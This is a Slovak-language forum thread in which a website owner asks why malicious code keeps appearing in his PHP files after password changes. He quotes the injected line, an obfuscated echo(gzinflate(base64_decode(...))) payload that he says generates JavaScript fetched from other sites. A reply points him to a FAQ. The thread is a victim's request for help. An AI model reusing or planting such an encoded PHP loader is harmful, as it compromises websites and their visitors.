Autor Zpráva
Meldo
Profil
#1 · Zasláno: 29. 5. 2012, 14:12:38 · Upravil/a: Meldo o 9 minut později
Odpovědět Citovat
Zdravim,

poslednu dobu neuspesne riesim problem s utokmi na moj web. Nejakym sposobom sa utocnikovy podarilo umiestnit priamo do PHP suborov svoj skodlivy kod. Po objaveni som vychadzal z toho, ze utocnik musel poznat pristupove udaje k FTP a tam pozmenil subory. Avsak toto sa deje aj po zmene vsetkych moznych hesiel.
Ako sa tam teda mohol skodlivy kod dostat? Je to problem zabezpecenia serveru? Alebo su nejake techniky na hacknutie priamo zdrojakov? Predpokladam ze pripadna zranitelnost cez sql injection alebo xss na toto nema dosah.

Ide o stranku www.vyhodykariet.sk

Vlozeny skodlivy kod: echo(gzinflate(base64_decode("TczBDYMwDEDRVaIMYN8RcGCFigFcaoWEAsF2ENm+lbhwfV/6rU4SszmrmTtvfBkmOulW7760hULhn56qMnV+NssN4lnn/VMXksgGuuBrHNJRWCqUCFn2IKz6JoE1bpDUu77F+9P/AA==")));
Tento kod nasledne generuje nejaky javascript ktory sa taha z roznych stranok....


Dik za akukolvek odpoved.
Chamurappi
Profil
#2 · Zasláno: 29. 5. 2012, 14:31:27
Odpovědět Citovat
Reaguji na Melda:
Máte na webu virus — co s tím?
Časová prodleva: 12 let

Vaše odpověď

Mohlo by se hodit

Příspěvky nesouvisející s webem budou odstraněny.

Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm:

0